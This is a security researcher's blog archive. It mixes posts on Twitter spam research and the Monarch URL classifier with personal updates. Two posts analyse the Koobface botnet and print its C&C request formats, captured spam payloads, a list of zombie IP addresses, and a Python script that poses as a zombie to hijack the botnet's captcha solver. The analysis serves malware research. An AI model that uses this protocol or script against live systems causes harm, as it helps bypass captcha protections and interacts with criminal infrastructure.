Working @Twitter & Researching 4 Facebook

June 15th, 2011 — 7:15am

After a bit of juggling and finishing up research at Berkeley for the Spring (fingers crossed for IMC 2011), I landed an internship at Twitter over the Summer. My goal is to examine spam that is targeting their systems and to see whether any of the research ideas coming out of our Berkeley group are transferable. Plus, I get sweet sweet access to data.

Also, to my surprise, I won a fellowship from Facebook to continue performing security research into social networks (starting next Fall). The meat of my proposal include understanding malicious application usage, account abuse, and characterizing the monetization of social network spam. I’m delighted my proposal got some traction; now to just get the work done next year.

Comment » | Facebook, Life, Twitter

Monarch: Preventing Spam in Real-Time

June 15th, 2011 — 6:51am

(This post is based on research from Oakland 2011 – a pdf is available under my publications)

Recently we presented our research on Monarch, a real-time system that crawls URLs as they are submitted to web services and determines whether the URLs direct to spam. The system is geared towards environments such as email or social networks where messages are near-interactive and accessed within seconds after delivery.

The two major previous approaches for detecting and filtering spam include domain and IP blacklists for email and account-based heuristics in social networks which attempt to detect abusive user behavior. However, these approaches fail to protect web services. In particular, blacklists are too inaccurate and slow in listing new spam URLs. Similarly, account-based heuristics incur delays between a fraudulent account’s creation and its subsequent detection due to the need to build a history of (mis-)activity. Furthermore, these heuristics for automation fail to detect compromised accounts that exhibit a mixture of spam and benign behaviors. Given these limitations, we seek to design a system that operates in real-time to limit the period users are exposed to spam content; provides fine-grained decisions that allow services to filter individual messages posted by users; but functions in a manner generalizable to many forms of web services.

To do this, we develop a cloud-based system for crawling URLs in real-time that classifies whether a URL’s content, underlying hosting infrastructure, or page behavior exhibits spam properties. This decision can then be used by web services to either filter spam or as a signal for further analysis.

Design Goals

When we developed Monarch, we had six principles that influenced our architecture and approach:

  1. Real-time results. Social networks and email operate as near-interactive, real-time services. Thus, significant delays in filtering decisions degrade the protected service.
  2. Readily scalable to required throughput. We aim to provide viable classification for services such as Twitter that receive over 15 million URLs a day.
  3. Accurate decisions. We want the capability to emphasize low false positives in order to minimize mistaking non-spam URLs as spam.
  4. Fine-grained classification. The system should be capable of distinguishing between spam hosted on public services alongside non-spam content (i.e., classification of individual URLs rather than coarser-grained domain names).
  5. Tolerant to feature evolution. The arms-race nature of spam leads to ongoing innovation on the part of spammers’ efforts to evade detection. Thus, we require the ability to easily retrain to adapt to new features.
  6. Context-independent classification. If possible, decisions should not hinge on features specific to a particular service, allowing use of the classifier for different types of web services.

Architecture

The architecture for Monarch consists of four components. First, messages from web services (tweets and emails in our prototype) are inserted into a dispatch Kestrel queue in a phase called URL Aggregation. These are then dequeued for Feature Collection, where a cluster of EC2 machines crawls each URL to fetch the HTML content, resolve all redirects, monitor all IP addresses contacted, and perform a number of host lookups and geolocation resolution. We optimize feature collection to include caching and whitelisting of popular benign content. These features are then stored in a database, which is later used during Feature Extraction to transform the data into meaningful binary vectors. These are then supplied to Classification. We obtain a labeled dataset from email spam traps as well as blacklists (our only means of obtaining a ground truth set of spam on Twitter). Using a distributed logistic regression with L1-regularization, which we detail in the paper, we are able to reduce from 50 million features down to 100,000 of the most meaningful features and build a model of spam in 45 minutes for 1 million samples. During live operation, we simply use this model to classify the features of a URL. Overall, it takes roughly 6 seconds from insertion into the dispatch queue to obtain a final decision for whether a URL is spam, with network delay accounting for the majority of overhead.

Results

  • Training on both email and tweets, we are able to generate a unified model that correctly classifies 91% of samples, with 0.87% false positives and 17.6% false negatives.
  • Throughput of the system is 638,000 URLs/day when running on 20 EC2 instances.
  • Decision time for a single URL is ~6 seconds

One of the unexpected results is that Twitter spam appears to be independent from email spam, with different campaigns occurring in both services simultaneously. This seems to indicate the actors targeting email haven’t modified their infrastructure to attack Twitter yet, though this may change over time.

Feedback

There remain a number of challenges in running a system like Monarch that are discussed in the paper as well as pointed out by other researchers.

  • Feature Evasion: Spammers can attempt to game the machine learning system. Given the real-time feedback for whether a URL is spam, they can attempt to modify their content or hosting to avoid detection.
  • Time-based Evasion: URLs are crawled immediately upon their submission to the dispatch queue. This creates a time of click, time of use challenge where spammers can present benign content upon sending an email/tweet, but then change the content to spam after the URL is cleared.
  • Crawler Evasion: Given we operate on a limited IP space and use single browser type, attackers can fingerprint both our hosting and browser client. They can then redirect our crawlers to benign content, while sending legitimate visitors to hostile content.
  • Side effects: Not all websites adhere to the standard that GET requests should have no side effects. In particular, subscribe and unsubscribe URLs as well as advertisements may have side effects introduced by our crawler.

Other interesting questions also remain to be answered. In particular, it would be useful to understand how accuracy performs over time on a per campaign basis. Some campaigns may last a long time, increasing our overall accuracy, while quickly churning campaigns that introduce new features may result in lower accuracy. Similarly, it would be useful to understand whether the features we identify appear in all campaigns (and are long lasting), or whether we are able to quickly adapt to the introduction of new features and new campaigns.

Comment » | Twitter, Underground Economies

@spam: The underground on 140 characters or less

August 21st, 2010 — 2:20am

(This post is based on research to appear in CCS 2010 — an advance pdf is available under my publications)

To understand spam propagating within Twitter, we plugged into Twitter’s streaming API and monitored tweets submitted to the site over the course of one month. Given that we have no pre-existing notion of what spam ‘looks like’, we use three blacklists to flag URLs previously identified in email spam: Google Safebrowsing, URIBL, and Joewein. Due to the potential of URL shortening provided by services such as bit.ly or other obfuscation techniques, we crawl each URL until reaching the final landing page and use the domain for determining blacklist presence.

During our monitoring we gathered over 200 million tweets from the stream and crawled 25 million URLs. Over 3 million tweets were identified as spam. Of the URLs crawled, 2 million were identified as spam by blacklists, 8% of all unique links. Of these blacklisted URLs, 5% were malware and phishing, while the remaining 95% directed users towards scams.

Spam Breakdown by Type

Twitter presents itself as an entirely different delivery mechanism from email, with a vastly different audience. For that reason, we analyzed the breakdown of spam on Twitter to understand which players were involved and how they correspond to spam directed at email. As shown in the figure below, many of the traditional email scams have found their way onto Twitter, but a new category purporting an easy solution to generating Twitter followers has appeared, largely directing users to phishing pages that steal Twitter credentials.

 

Abuse of Twitter Features

Given the limitation of 140 characters to attract a victim’s attention, Twitter scams have evolved to abuse Twitter’s core features such as @mentions, #hashtags, and RT @ retweets.

Callouts are mentions used to target specific users in order to infiltrate their feed and appear personalized. In our data set, roughly 10% of scams were advertised using personalized mentions, while only 3% of phishing/malware used the feature. An example would be: Win an iTouch AND a $150 Apple gift card @victim! http://spam.com

Retweet Hijacking is an attempt to abuse the credibility of other users to draw a wider audience or increase trust. Given a tweet from a trusted user such as @barackobama A great battle is ahead of us…, a spammer will prepend a link and retweet the original text: http://spam.com RT @barackobama A great battle is ahead of us…. Because modifying and retweeting is common behavior, there is no simple mechanism to detect forgeries or malicious behavior.

Retweet Purchasing relies on other trusted parties to retweet spam tweets. Services such as retweet.it purport to retweet a message 50 times to 2,500 Twitter followers for $5 or 300 times to 15,000 followers for $30. The accounts used to retweet are other Twitter members (or bots) who sign up for the retweet service, allowing their accounts to be used to generate traffic.

Trend Setting is an attempt to create a trending topic on Twitter by abusing hundreds of compromised/fake accounts all tweeting with the same #hashtag. We encountered a total of 12 different attempts to generate trends using roughly 2,000 accounts each, all purporting to provide users with more followers if they provide their account credentials. Of tweets in our data set, roughly 70% of all phishing tweets included a trend setting #hashtag.

Trend Hijacking allows spammers to ride on the success of currently trending topics, allowing spam tweets to be syndicated to the entire Twittersphere rather than a limited audience of followers. Of all the #hashtags we encountered in spam, roughly 86% were user-generated topics. An example would be Help donate to #haiti relief: http://spam.com.

How Successful is Twitter Spam?

Despite widespread abuse of Twitter by spammers, the current mechanisms in place to prevent spam are fairly limited. Twitter currently uses Google’s Safebrowsing API to block malicious links, simultaneously relying on account heuristics such as aggressive friending/unfriending and repeated tweets to detect spam behavior. Paired with a system designed for the dissemination of links and information, Twitter is an ideal propagation platform for spam.

To estimate Twitter clickthrough, we measure the ratio of clicks a link receives, reported by bit.ly compared to the number of tweets sent. Given the broadcast nature of tweeting, we measure reach as a function of both the total tweets sent t and the followers exposed to each tweet f, where reach equals txf . In the event multiple accounts with potentially variable number of followers all participate in tweeting a single URL, we measure total reach as the sum of each individual account’s reach. Averaging the ratio of clicks to reach for 245,000 bit.ly URLs, we find roughly 0.13% of spam tweets generate a visit, orders of magnitude higher when compared to clickthrough rates of 0.003-0.006% reported for spam email.

Twitter’s improved clickthrough rate compared to email has a number of explanations. First, users are faced with only 140 characters in which to base their decision whether a URL is spam. Paired with an implicit trust for accounts users befriend, increased clickthrough potentially results from a mixture of naivety and lack of information. This result highlights the need for social networks to quickly adapt to spam threats, adopting similar controls to email, though within a real-time framework.

Comment » | Malware, Twitter, Underground Economies

Zion to California

July 1st, 2010 — 7:36am

Perhaps worthy of an update, I recently moved out to California to begin working for Dawn Song and Vern Paxon as a researcher at the University of California, Berkeley. If the cards have it, I hope to continue my Ph.D. work here. On the drive out I spent a few days in Zion camping and day hiking. Flickr describes the experience better than I can.

Comment » | Life

Koobface Spam

March 8th, 2010 — 2:28am

The Koobface botnet preys on social networking sites as its primary means of propagation. Unsuspecting victims browsing Facebook, Twitter, and other social networks are sent messages from users they believe to be friends. In truth, these users are either compromised accounts that fell for one of Koobface’s scams or fraudulent accounts created by Koobface. The messages sent by Koobface can be recovered by directly interacting with the Koobface C&C.

Spamming Modules

The Koobface botnet has unique spamming modules for a multitude of websites including Facebook, MySpace, Twitter, and Bebo. Despite this fact, the network level behaviour for each module follows a generic template:

POST /.sys/?action=[module name]&v=[version]

At the current time, Koobface supports 6 modules with varying version numbers. Sending a request with an outdated version will result in a signal to update the module. This can be avoided by using &v=200 for every request, (the version check is a simple less than statement), however, this is a noticeable perturbation from typical zombie behaviour.

fbgen | Facebook
twgen | Twitter
msgen | MySpace
begen | Bebo
tggen | ?
higen | hi5

The responses from each POST are displayed below. Of the modules, only Facebook uses obfuscation. Each response contains a link and an associated message to spam.

POST /.sys/?action=fbgen&v=101
#BLACKLABEL
#BLUELABEL
e3 14 a5 17 2d ec a0 4c 94 a3 e2 aa 6c 7e bd a6
2e 84 c1 1c ca d4 fa 55 aa 3b cc 4b 8f d8 f7 28
0f 5d e2 2e 3f b7 f5 30 b5 d8 eb 89 66 f8 89 49
f6 4e 5a e5 0e 7d c2 bd

 

POST /.sys/?action=twgen&v=08 

#BLACKLABEL
TEXT_M|OMFG!! You must see this video!! :))

http://www.stevesummerhill.com/index.html/

TEXT_W|OMFG!! You must see this video!! :))

http://www.stevesummerhill.com/index.html/

TEXT_S| http://www.stevesummerhill.com/index.html/
#CACHE MD5|51da895e24b09bc45f6b461a107407ee

 

POST /.sys/?action=msgen&v=26

#BLACKLABEL
SIMPLEMODE|1
FBTARGETPERPOST|15
TITLE_M|;)
TEXT_M|WOW
LINK_M|%3Ca%20href%3D%27http%3A//bit.ly/4NHlsT%27%3E
I olve wathcing you opsing anked!
TITLE_B|;)
TEXT_B|Cooooool Video http://bit.ly/4NHlsT
TEXT_C|Cool Video http://bit.ly/4NHlsT
#CACHE
MD5|f7fe75dc9a2fd0343bd62bdae9a709af

#SAVED 2010-01-22 16:11:36

Compromised Redirectors

Each spam message provided by Koobface contains a link to a compromised website acting as a redirector to Koobface malware. For redundancy, each website is embedded with a list of 20 zombies to forward visitors towards. Given that zombies have unpredictable uptime, the compromised redirector acts as highly available intermediary, while zombies host the actual malware and social engineering attack.

Recovering the IP addresses of zombies pointed to by a redirector is fairly simple as its stored in a largely obfuscated manner:

var b6e = [
'86.' + '126.205.43',
'68.36' + '.78.85',
'19' + '0.213.31.133',
'24.235.' + '129.182',
'76' + '.249.244.80',
'98.' + '221.155.223',
'98' + '.208.114.221',
'173' + '.31.203.53',
'79.1' + '16.33.205',
'74.130.' + '134.165',
'88.165.' + '115.173',
'67.24' + '4.2.122',
'99.91' + '.48.26',
'95.' + '35.211.92',
'85.64' + '.111.111',
'173.18' + '.98.113',
'24' + '.99.82.56',
'65.9' + '6.238.254',
'173.' + '22.162.187',
'76' + '.31.51.190',
''];

Once one of the zombies is determined to be available, a victim is redirected to a scam page modelled after Facebook or Youtube.

Comment » | Facebook, Koobface, Twitter, Underground Economies

Hijacking Koobface’s Captcha Solver

March 8th, 2010 — 12:44am

One of the interesting challenges of propagating malware through social media is the requirement of obtaining new accounts for spamming. The Koobface botnet automates this process by leveraging zombies to sign up for accounts on Facebook, Gmail, Blogger, and Google Reader. Each of these services requires a solution to a Captcha challenge which Koobface pushes off on a zombie machine’s owner to solve. During the course of infection, a Koobface zombie will repeatedly poll the C&C for Captchas requiring solutions, in turn prompting users with a threat to shutdown unless the Captcha is solved. As any zombie can query the botnet for a Captcha solution, an adversary can re-purpose the botnet into a personal Captcha solver.

Initiating a Request

A Captcha request to the system can target either Google’s Captcha software or reCAPTCHA; in the case of Google, a flag &b=goo is appended to the request. As with most traffic between a zombie and the Koobface C&C, traffic occurs in plaintext over HTTP. Solving a Captcha is initiated by sending an HTTP POST to a Koobface C&C server. The HTTP POST includes the raw JPG data for the Captcha image to be solved, which will be displayed on a victim’s machine.

POST /.sys/?post=true&path=captcha&a=save[&b=goo]

The Koobface server will return a random identifier that’s appended in future requests to the server as a zombie repeatedly probes for a response:

POST /.sys/?post=true&path=captcha&a=query[&b=goo]&id=26076175

For each solution request, the server will respond with one of three states, directing the bot to its appropriate behaviour:

1 | Pending; repeat request at later time
3 | Solution available
0 | Abandon current request; no one has solved in maximum timeout

Solution Mechanism

Once injected, a separate zombie will randomly probe for a Captcha requiring a solution and submit a victim’s response to the C&C. The zombie also reports its version [&v=20], and the number of attempts its made contacting the C&C for a Captcha [&i=0; i++ for each failed attempt].

# Request a Captcha ID requiring a solution.
GET /.sys/?action=captcha&a=get&i=0&v=20

# Request the image associated with a given ID
GET /.sys/?action=captcha&a=image&i=3&v=20&id=23063812

# Upload a response
GET /.sys/?action=captcha&a=put&id=23063812&v=20&code=valid%20text

Use of the goo flag when injecting a packet is necessary as victims are prompted with different instructions depending on the type of Captcha being solved. Given the wrong flag, a valid solution wont be accepted due to a regular expression mismatch; Google has only one word in its Captchas, while reCATPCHA uses two words.

Enter both words below, separated by a space.|
       ([a-zA-Z0-9\$\.\,\/]+)([ ]+)([a-zA-Z0-9\$\.\,\/]+)
Enter the word below.|
       ([a-zA-Z0-9\$\.\,\/]+)

Python Implementation

def send_packet(domain,packet):
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((domain, 80))
        s.send(packet)
        resp = s.recv(1024)
        return resp
    except (socket.error,socket.herror,socket.gaierror,socket.timeout):
        logging.error("Failed to query socket")
        return None

def captcha_query():

    # Select a random C&C domain from list of Koobface hosts
    domain = random.choice(CC_DOMAINS)
    domain = re.sub('(http://)?(www\.)?','',domain)

    # Fetch a Captcha image to be solved
    data = fetch_image()
    length = len(data)

    # Mimic Koobface's zombie behavior
    packet = "POST /.sys/?post=true&path=captcha&a=save&b=goo HTTP/1.0\r\n" + \
             "accept-encoding: text/html, text/plain\r\nConnection: close\r\n" + \
             "Host: %s\r\nUser-Agent: Mozilla/5.01 " %(domain)+ \
             "(Windows; U; Windows NT 5.2; ru; rv:1.9.0.1) " + \
             "Gecko/20050104 Firefox/3.0.2\r\n" + \
             "Content-Type: binary/octet-stream\r\n" + \
             "Content-Length: %s\r\n\r\n" %(length)
    packet = str(packet) + str(data)

    # Sent packet using raw socket
    resp = send_packet(domain,packet)

Comments Off | Koobface

Sand and Dust

July 9th, 2008 — 4:50am

Researching at Sandia National Labs for the summer, though my projects have more to do with coding as opposed to novel insight. It’s been a strange summer, but exceedingly fun. I adhered to my non-binding commitment to get as much camping and hiking in as possible while in New Mexico, trips landing me at El Malpais, Bandelier, El Morro, Durango, and, fingers crossed, Carlsbad. New and old friends have kept me entertained during my summer stint away from home, but I’m looking forward to classes back at Champaign-Urbana. With Embedded System Design, Advanced Applied Cryptography, Communication Networks, and Operating Systems, I should find enough work along with research to make the semester worthwhile.

As always, Flickr has photos from recent excursions, and maybe even some pictures of people. I also updated the Library with recent reads, with other updates to follow.

Comment » | Hiking, Life

Where In Life Is Life Going?

January 9th, 2008 — 4:49am

This semester I was hoping to start some interesting courses, but Cyberspace Law, Communication Networks, and Advanced Applied Cryptography were all canceled. In lue of my schedule being turned on its head I decided to take Random Processes, Fault-Tolerant Hardware Design, and on a whim, Advances in Psychobiology. Despite the course load and research I’ve found myself with a load of free time which is being directed towards new hobbies (and duties):

  • Outdoor Illini: After getting back from snowshoeing the White Mountains, I decided to finally put some effort into starting a backpacking and camping group on campus called the Outdoor Illini. Hopefully the group will gain some traction — the whole point is to find other backpackers interested in leaving UIUC every few weekends and finding a park to explore. Bitter cold, snow, and rain are making the prospect of leaving UIUC this winter unlikely.
  • SORF Board: I decided to fill an open seat on the SORF Board. Every other Thursday I get to spend 5+ hours reading applications at a blurring speed in an attempt to determine which activities the campus should fund. Serving on the board is interesting, running for re-election is not.
  • Home Brewing: Bar hoping on campus is only so entertaining until it becomes customary. To break the monotony, some compatriots and I have taken to home brewing our own beer. It’s interesting to bring up home brewing to other people; inevitably someone in the group chimes in with “oh, I used to do that too.” Why didn’t they share this with me earlier?
  • Photography: In tandem with hiking and camping more often I’ve taken up photography again. I’m trying to motivate myself to buy a new SLR camera, but the price tag and size of the camera is currently a deterrent. Despite those two factors, there’s no doubting the pictures that come out of an SLR camera put my current camera to shame.

As always, Flickr has photos from recent explorations. I believe that’s enough effort in updating this would-be website.

Comment » | Life

Sunset on Western Sunsets

August 7th, 2007 — 4:52am

Ending my summer stint in Albuquerque, NM. Some useful research came out of the experience, but it was more worthwhile for the people and the area. Though Albuquerque may be the slowest of cities to live in, the natural scenery is a major draw to return some day.

I added some photos to Flickr from hiking trips into the Sandia mountains and into the lava parks of El Malpais.

Time to be heading back to _flat_ Illinois and picking up graduate studies. Courses this semester include abstract algebra, advanced probability and statistics, computer security, and a security seminar. With the added ‘bonus’ of research, life should be fairly busy. Too bad the mountains wont be right outside to escape into.

Comment » | Life

Winding Away, Winding …

April 17th, 2007 — 4:55am

Finishing up the rest of the year of my undergraduate degree. Some interesting courses, but mostly this semester was just a 6 month break. Looking forward to the summer and doing some real work in security rather than just playing around.

After that, 4-5 more years of courses. Funny how things repeat themselves.

Comment » | Life

Back to top